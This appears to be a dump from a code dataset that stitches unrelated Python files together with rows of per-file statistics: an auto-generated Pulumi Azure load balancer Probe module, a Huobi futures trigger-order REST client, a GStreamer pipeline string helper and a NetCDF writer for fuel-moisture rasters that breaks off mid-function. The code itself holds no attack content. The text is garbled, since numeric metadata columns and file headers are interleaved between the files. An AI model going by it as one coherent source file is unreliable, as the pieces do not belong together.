        pulumi.set(self, "number_of_probes", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter
    def protocol(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        """
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol", value)

    @property
    @pulumi.getter(name="requestPath")
    def request_path(self) -> Optional[pulumi.Input[str]]:
        """
        The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        """
        return pulumi.get(self, "request_path")

    @request_path.setter
    def request_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "request_path", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which to create the resource.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

class Probe(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 interval_in_seconds: Optional[pulumi.Input[int]] = None,
                 loadbalancer_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 number_of_probes: Optional[pulumi.Input[int]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 request_path: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a LoadBalancer Probe Resource.

        > **NOTE** When using this resource, the Load Balancer needs to have a FrontEnd IP Configuration attached.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_public_ip = azure.network.PublicIp("examplePublicIp",
            location="West US",
            resource_group_name=example_resource_group.name,
            allocation_method="Static")
        example_load_balancer = azure.lb.LoadBalancer("exampleLoadBalancer",
            location="West US",
            resource_group_name=example_resource_group.name,
            frontend_ip_configurations=[azure.lb.LoadBalancerFrontendIpConfigurationArgs(
                name="PublicIPAddress",
                public_ip_address_id=example_public_ip.id,
            )])
        example_probe = azure.lb.Probe("exampleProbe",
            resource_group_name=example_resource_group.name,
            loadbalancer_id=example_load_balancer.id,
            port=22)
        ```

        ## Import

        Load Balancer Probes can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:lb/probe:Probe example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/loadBalancers/lb1/probes/probe1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] interval_in_seconds: The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        :param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
        :param pulumi.Input[str] name: Specifies the name of the Probe.
        :param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        :param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        :param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        :param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ProbeArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a LoadBalancer Probe Resource.

        > **NOTE** When using this resource, the Load Balancer needs to have a FrontEnd IP Configuration attached.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_public_ip = azure.network.PublicIp("examplePublicIp",
            location="West US",
            resource_group_name=example_resource_group.name,
            allocation_method="Static")
        example_load_balancer = azure.lb.LoadBalancer("exampleLoadBalancer",
            location="West US",
            resource_group_name=example_resource_group.name,
            frontend_ip_configurations=[azure.lb.LoadBalancerFrontendIpConfigurationArgs(
                name="PublicIPAddress",
                public_ip_address_id=example_public_ip.id,
            )])
        example_probe = azure.lb.Probe("exampleProbe",
            resource_group_name=example_resource_group.name,
            loadbalancer_id=example_load_balancer.id,
            port=22)
        ```

        ## Import

        Load Balancer Probes can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:lb/probe:Probe example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/loadBalancers/lb1/probes/probe1
        ```

        :param str resource_name: The name of the resource.
        :param ProbeArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(ProbeArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       interval_in_seconds: Optional[pulumi.Input[int]] = None,
                       loadbalancer_id: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       number_of_probes: Optional[pulumi.Input[int]] = None,
                       port: Optional[pulumi.Input[int]] = None,
                       protocol: Optional[pulumi.Input[str]] = None,
                       request_path: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ProbeArgs.__new__(ProbeArgs)

            __props__.__dict__["interval_in_seconds"] = interval_in_seconds
            if loadbalancer_id is None and not opts.urn:
                raise TypeError("Missing required property 'loadbalancer_id'")
            __props__.__dict__["loadbalancer_id"] = loadbalancer_id
            __props__.__dict__["name"] = name
            __props__.__dict__["number_of_probes"] = number_of_probes
            if port is None and not opts.urn:
                raise TypeError("Missing required property 'port'")
            __props__.__dict__["port"] = port
            __props__.__dict__["protocol"] = protocol
            __props__.__dict__["request_path"] = request_path
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["load_balancer_rules"] = None
        super(Probe, __self__).__init__(
            'azure:lb/probe:Probe',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            interval_in_seconds: Optional[pulumi.Input[int]] = None,
            load_balancer_rules: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            loadbalancer_id: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            number_of_probes: Optional[pulumi.Input[int]] = None,
            port: Optional[pulumi.Input[int]] = None,
            protocol: Optional[pulumi.Input[str]] = None,
            request_path: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Probe':
        """
        Get an existing Probe resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] interval_in_seconds: The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        :param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
        :param pulumi.Input[str] name: Specifies the name of the Probe.
        :param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        :param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        :param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        :param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _ProbeState.__new__(_ProbeState)

        __props__.__dict__["interval_in_seconds"] = interval_in_seconds
        __props__.__dict__["load_balancer_rules"] = load_balancer_rules
        __props__.__dict__["loadbalancer_id"] = loadbalancer_id
        __props__.__dict__["name"] = name
        __props__.__dict__["number_of_probes"] = number_of_probes
        __props__.__dict__["port"] = port
        __props__.__dict__["protocol"] = protocol
        __props__.__dict__["request_path"] = request_path
        __props__.__dict__["resource_group_name"] = resource_group_name
        return Probe(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="intervalInSeconds")
    def interval_in_seconds(self) -> pulumi.Output[Optional[int]]:
        """
        The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        """
        return pulumi.get(self, "interval_in_seconds")

    @property
    @pulumi.getter(name="loadBalancerRules")
    def load_balancer_rules(self) -> pulumi.Output[Sequence[str]]:
        return pulumi.get(self, "load_balancer_rules")

    @property
    @pulumi.getter(name="loadbalancerId")
    def loadbalancer_id(self) -> pulumi.Output[str]:
        """
        The ID of the LoadBalancer in which to create the NAT Rule.
        """
        return pulumi.get(self, "loadbalancer_id")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Probe.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="numberOfProbes")
    def number_of_probes(self) -> pulumi.Output[Optional[int]]:
        """
        The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        """
        return pulumi.get(self, "number_of_probes")

    @property
    @pulumi.getter
    def port(self) -> pulumi.Output[int]:
        """
        Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        """
        return pulumi.get(self, "port")

    @property
    @pulumi.getter
    def protocol(self) -> pulumi.Output[str]:
        """
        Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        """
        return pulumi.get(self, "protocol")

    @property
    @pulumi.getter(name="requestPath")
    def request_path(self) -> pulumi.Output[Optional[str]]:
        """
        The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        """
        return pulumi.get(self, "request_path")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the resource group in which to create the resource.
        """
        return pulumi.get(self, "resource_group_name")
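A usage sketch for the args-based overload defined above; the resource names, the load balancer ID, and the health-check path are placeholders, not values from this file.

import pulumi_azure as azure

probe = azure.lb.Probe(
    "exampleProbe",
    azure.lb.ProbeArgs(
        resource_group_name="example-resources",  # placeholder resource group
        loadbalancer_id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/example-resources/providers/Microsoft.Network/loadBalancers/lb1",  # placeholder ID
        port=443,
        protocol="Https",
        request_path="/healthz",  # request_path is required when protocol is Http or Https
    ))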
| 50.496479
| 327
| 0.67171
| 3,648
| 28,682
| 5.089364
| 0.068531
| 0.068728
| 0.053539
| 0.046214
| 0.911936
| 0.896747
| 0.882904
| 0.863676
| 0.845362
| 0.830604
| 0
| 0.008239
| 0.238303
| 28,682
| 567
| 328
| 50.585538
| 0.84158
| 0.429956
| 0
| 0.731392
| 1
| 0
| 0.104431
| 0.001408
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161812
| false
| 0.003236
| 0.016181
| 0.006472
| 0.275081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
94fc20360c0dace3274e116577e122ad654cbb94
| 4,785
|
py
|
Python
|
huobi/platforms/huobi_usdt_swap/rest_trigger_order.py
|
yahgwai/huobi_futures_Python
|
6f96379368b53848017df2f6a94f3a53083cec0a
|
[
"MIT"
] | null | null | null |
huobi/platforms/huobi_usdt_swap/rest_trigger_order.py
|
yahgwai/huobi_futures_Python
|
6f96379368b53848017df2f6a94f3a53083cec0a
|
[
"MIT"
] | null | null | null |
huobi/platforms/huobi_usdt_swap/rest_trigger_order.py
|
yahgwai/huobi_futures_Python
|
6f96379368b53848017df2f6a94f3a53083cec0a
|
[
"MIT"
] | null | null | null |
from huobi.platforms.huobi_usdt_swap.http_utils import *
class RestTriggerOrder:
    def __init__(self, access_key: str, secret_key: str, host: str = None):
        self.access_key = access_key
        self.secret_key = secret_key
        if host is None:
            host = "api.btcgateway.pro"
        self.host = host

    def isolated_order(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_trigger_order"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_order(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_trigger_order"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_cancel(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_trigger_cancel"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_cancel(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_trigger_cancel"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_cancel_all(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_trigger_cancelall"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_cancel_all(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_trigger_cancelall"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_get_open_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_trigger_openorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_get_open_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_trigger_openorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_get_his_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_trigger_hisorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_get_his_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_trigger_hisorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_tpsl_order(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_tpsl_order"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_tpsl_order(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_tpsl_order"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_tpsl_cancel(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_tpsl_cancel"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_tpsl_cancel(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_tpsl_cancel"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_tpsl_cancel_all(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_tpsl_cancelall"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_tpsl_cancel_all(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_tpsl_cancelall"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_get_tpsl_open_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_tpsl_openorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_get_tpsl_open_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_tpsl_openorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_get_tpsl_his_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_tpsl_hisorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_get_tpsl_his_orders(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_tpsl_hisorders"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def isolated_get_relation_tpsl_order(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_relation_tpsl_order"
        return post(self.access_key, self.secret_key, self.host, path, data)

    def cross_get_relation_tpsl_order(self, data: dict = None) -> json:
        path = "/linear-swap-api/v1/swap_cross_relation_tpsl_order"
        return post(self.access_key, self.secret_key, self.host, path, data)
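A usage sketch for the client above; the API keys are placeholders, and the request field name contract_code follows Huobi's linear-swap API documentation rather than anything defined in this file.

client = RestTriggerOrder("your-access-key", "your-secret-key")
# Query open trigger orders for one contract on isolated margin.
resp = client.isolated_get_open_orders({"contract_code": "BTC-USDT"})
print(resp)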
| 48.826531
| 76
| 0.686938
| 709
| 4,785
| 4.393512
| 0.066291
| 0.101124
| 0.100161
| 0.140289
| 0.939005
| 0.931942
| 0.931942
| 0.931942
| 0.931942
| 0.931942
| 0
| 0.005694
| 0.192476
| 4,785
| 98
| 77
| 48.826531
| 0.800466
| 0
| 0
| 0.297297
| 0
| 0
| 0.200167
| 0.196406
| 0
| 0
| 0
| 0
| 0
| 1
| 0.310811
| false
| 0
| 0.013514
| 0
| 0.635135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
a21ab3a270b479cb629aff6bebd49c85e29d8a8a
| 225
|
py
|
Python
|
pertemuan_12/gst_file.py
|
Muhammad-Yunus/Jetson-Nano-OpenCV-Learn
|
933cb2594539a877030fb82dc3e6867409c1a557
|
[
"Apache-2.0"
] | null | null | null |
pertemuan_12/gst_file.py
|
Muhammad-Yunus/Jetson-Nano-OpenCV-Learn
|
933cb2594539a877030fb82dc3e6867409c1a557
|
[
"Apache-2.0"
] | null | null | null |
pertemuan_12/gst_file.py
|
Muhammad-Yunus/Jetson-Nano-OpenCV-Learn
|
933cb2594539a877030fb82dc3e6867409c1a557
|
[
"Apache-2.0"
] | 2
|
2021-09-28T00:24:21.000Z
|
2022-03-09T13:38:29.000Z
|
def gst_file_loader(filename):
    return 'filesrc location=' + filename + ' ! qtdemux ! queue ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw,format=BGRx ! queue ! videoconvert ! queue ! video/x-raw, format=BGR ! appsink'
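A usage sketch: the returned pipeline string is intended for OpenCV's GStreamer backend (the cv2 import and the sample filename are assumptions, not part of this file).

import cv2

cap = cv2.VideoCapture(gst_file_loader("sample.mp4"), cv2.CAP_GSTREAMER)
ok, frame = cap.read()  # frames arrive as BGR, as requested by the caps in the pipeline
cap.release()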
| 112.5
| 194
| 0.715556
| 28
| 225
| 5.678571
| 0.75
| 0.075472
| 0.113208
| 0.188679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031579
| 0.155556
| 225
| 2
| 194
| 112.5
| 0.805263
| 0
| 0
| 0
| 0
| 0.5
| 0.730089
| 0.10177
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
bf73cf72eea2cf91c3515f5d285c35c44acac2a2
| 10,521
|
py
|
Python
|
gridflow/netcdf.py
|
ANU-WALD/gridflow_lib
|
8757230c95fba00a1b7457867ab84307c2672729
|
[
"Apache-2.0"
] | null | null | null |
gridflow/netcdf.py
|
ANU-WALD/gridflow_lib
|
8757230c95fba00a1b7457867ab84307c2672729
|
[
"Apache-2.0"
] | null | null | null |
gridflow/netcdf.py
|
ANU-WALD/gridflow_lib
|
8757230c95fba00a1b7457867ab84307c2672729
|
[
"Apache-2.0"
] | null | null | null |
from osgeo import gdal
import numpy as np
import netCDF4
import json
from datetime import datetime
def pack_fmc(hdf_file, date, mean_arr, std_arr, q_mask, dest):
    with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
        with open('nc_metadata.json') as data_file:
            attrs = json.load(data_file)
        for key in attrs:
            setattr(ds, key, attrs[key])
        setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))

        rast = gdal.Open('HDF4_EOS:EOS_GRID:"{}":MOD_Grid_BRDF:Nadir_Reflectance_Band1'.format(hdf_file))
        proj_wkt = rast.GetProjection()
        geot = rast.GetGeoTransform()

        t_dim = ds.createDimension("time", 1)
        x_dim = ds.createDimension("x", rast.RasterXSize)
        y_dim = ds.createDimension("y", rast.RasterYSize)

        var = ds.createVariable("time", "f8", ("time",))
        var.units = "seconds since 1970-01-01 00:00:00.0"
        var.calendar = "standard"
        var.long_name = "Time, unix time-stamp"
        var.standard_name = "time"
        var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")

        var = ds.createVariable("x", "f8", ("x",))
        var.units = "m"
        var.long_name = "x coordinate of projection"
        var.standard_name = "projection_x_coordinate"
        var[:] = np.linspace(geot[0], geot[0]+(geot[1]*rast.RasterXSize), rast.RasterXSize)

        var = ds.createVariable("y", "f8", ("y",))
        var.units = "m"
        var.long_name = "y coordinate of projection"
        var.standard_name = "projection_y_coordinate"
        var[:] = np.linspace(geot[3], geot[3]+(geot[5]*rast.RasterYSize), rast.RasterYSize)

        var = ds.createVariable("lfmc_mean", 'f4', ("time", "y", "x"), fill_value=-9999.9)
        var.long_name = "LFMC Arithmetic Mean"
        var.units = '%'
        var.grid_mapping = "sinusoidal"
        var[:] = mean_arr[None,...]

        var = ds.createVariable("lfmc_stdv", 'f4', ("time", "y", "x"), fill_value=-9999.9)
        var.long_name = "LFMC Standard Deviation"
        var.units = '%'
        var.grid_mapping = "sinusoidal"
        var[:] = std_arr[None,...]

        var = ds.createVariable("quality_mask", 'i1', ("time", "y", "x"), fill_value=0)
        var.long_name = "Combined Bands Quality Mask"
        var.units = 'Cat'
        var.grid_mapping = "sinusoidal"
        var[:] = q_mask.astype(np.int8)[None,...]

        var = ds.createVariable("sinusoidal", 'S1', ())
        var.grid_mapping_name = "sinusoidal"
        var.false_easting = 0.0
        var.false_northing = 0.0
        var.longitude_of_central_meridian = 0.0
        var.longitude_of_prime_meridian = 0.0
        var.semi_major_axis = 6371007.181
        var.inverse_flattening = 0.0
        var.spatial_ref = proj_wkt
        var.GeoTransform = "{} {} {} {} {} {} ".format(*[geot[i] for i in range(6)])

def pack_flammability(fmc_file, date, flam, anom, q_mask, dest):
    with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
        with open('nc_metadata.json') as data_file:
            attrs = json.load(data_file)
        for key in attrs:
            setattr(ds, key, attrs[key])
        setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))

        rast = gdal.Open('NETCDF:"{}":lfmc_mean'.format(fmc_file))
        proj_wkt = rast.GetProjection()
        geot = rast.GetGeoTransform()

        t_dim = ds.createDimension("time", 1)
        x_dim = ds.createDimension("x", rast.RasterXSize)
        y_dim = ds.createDimension("y", rast.RasterYSize)

        var = ds.createVariable("time", "f8", ("time",))
        var.units = "seconds since 1970-01-01 00:00:00.0"
        var.calendar = "standard"
        var.long_name = "Time, unix time-stamp"
        var.standard_name = "time"
        var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")

        var = ds.createVariable("x", "f8", ("x",))
        var.units = "m"
        var.long_name = "x coordinate of projection"
        var.standard_name = "projection_x_coordinate"
        var[:] = np.linspace(geot[0], geot[0]+(geot[1]*rast.RasterXSize), rast.RasterXSize)

        var = ds.createVariable("y", "f8", ("y",))
        var.units = "m"
        var.long_name = "y coordinate of projection"
        var.standard_name = "projection_y_coordinate"
        var[:] = np.linspace(geot[3], geot[3]+(geot[5]*rast.RasterYSize), rast.RasterYSize)

        var = ds.createVariable("flammability", 'f4', ("time", "y", "x"), fill_value=-9999.9)
        var.long_name = "Flammability Index"
        var.units = '%'
        var.grid_mapping = "sinusoidal"
        var[:] = flam[None,...]

        var = ds.createVariable("anomaly", 'f4', ("time", "y", "x"), fill_value=-9999.9)
        var.long_name = "Flammability Anomaly"
        var.units = '%'
        var.grid_mapping = "sinusoidal"
        var[:] = anom[None,...]

        var = ds.createVariable("quality_mask", 'i1', ("time", "y", "x"), fill_value=0)
        var.long_name = "Combined Bands Quality Mask"
        var.units = 'Cat'
        var.grid_mapping = "sinusoidal"
        var[:] = q_mask.astype(np.int8)[None,...]

        var = ds.createVariable("sinusoidal", 'S1', ())
        var.grid_mapping_name = "sinusoidal"
        var.false_easting = 0.0
        var.false_northing = 0.0
        var.longitude_of_central_meridian = 0.0
        var.longitude_of_prime_meridian = 0.0
        var.semi_major_axis = 6371007.181
        var.inverse_flattening = 0.0
        var.spatial_ref = proj_wkt
        var.GeoTransform = "{} {} {} {} {} {} ".format(*[geot[i] for i in range(6)])

wgs84_wkt = 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.01745329251994328,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]'

def pack_fmc_mosaic(date, fmc_mean, fmc_stdv, q_mask, dest):
    lat0 = -10.
    lat1 = -44.
    lon0 = 113.
    lon1 = 154.
    res = 0.005
    x_size = int((lon1 - lon0)/res)
    y_size = int((lat1 - lat0)/(-1*res))
    geot = [lon0, res, 0., lat0, 0., -1*res]
    with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
        with open('nc_metadata.json') as data_file:
            attrs = json.load(data_file)
        for key in attrs:
            setattr(ds, key, attrs[key])
        setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))

        t_dim = ds.createDimension("time", 1)
        x_dim = ds.createDimension("longitude", fmc_mean.shape[1])
        y_dim = ds.createDimension("latitude", fmc_mean.shape[0])

        var = ds.createVariable("time", "f8", ("time",))
        var.units = "seconds since 1970-01-01 00:00:00.0"
        var.calendar = "standard"
        var.long_name = "Time, unix time-stamp"
        var.standard_name = "time"
        var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")

        var = ds.createVariable("longitude", "f8", ("longitude",))
        var.units = "degrees"
        var.long_name = "longitude"
        var.standard_name = "longitude"
        var[:] = np.linspace(lon0, lon1-res, num=x_size)

        var = ds.createVariable("latitude", "f8", ("latitude",))
        var.units = "degrees"
        var.long_name = "latitude"
        var.standard_name = "latitude"
        var[:] = np.linspace(lat0, lat1+res, num=y_size)

        var = ds.createVariable("fmc_mean", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
        var.long_name = "Mean Live Fuel Moisture Content"
        var.units = '%'
        var[:] = fmc_mean[None,...]

        var = ds.createVariable("fmc_stdv", 'f4', ("time", "latitude", "longitude"), fill_value=-9999.9)
        var.long_name = "Standard Deviation Live Fuel Moisture Content"
        var.units = '%'
        var[:] = fmc_stdv[None,...]

        var = ds.createVariable("quality_mask", 'i1', ("time", "latitude", "longitude"), fill_value=0)
        var.long_name = "Quality Mask"
        var.units = 'Cat'
        var[:] = q_mask[None,...]

def pack_flammability_mosaic(date, flam, anom, q_mask, dest):
    lat0 = -10.
    lat1 = -44.
    lon0 = 113.
    lon1 = 154.
    res = 0.005
    x_size = int((lon1 - lon0)/res)
    y_size = int((lat1 - lat0)/(-1*res))
    geot = [lon0, res, 0., lat0, 0., -1*res]
    with netCDF4.Dataset(dest, 'w', format='NETCDF4_CLASSIC') as ds:
        with open('nc_metadata.json') as data_file:
            attrs = json.load(data_file)
        for key in attrs:
            setattr(ds, key, attrs[key])
        setattr(ds, "date_created", datetime.now().strftime("%Y%m%dT%H%M%S"))

        t_dim = ds.createDimension("time", 1)
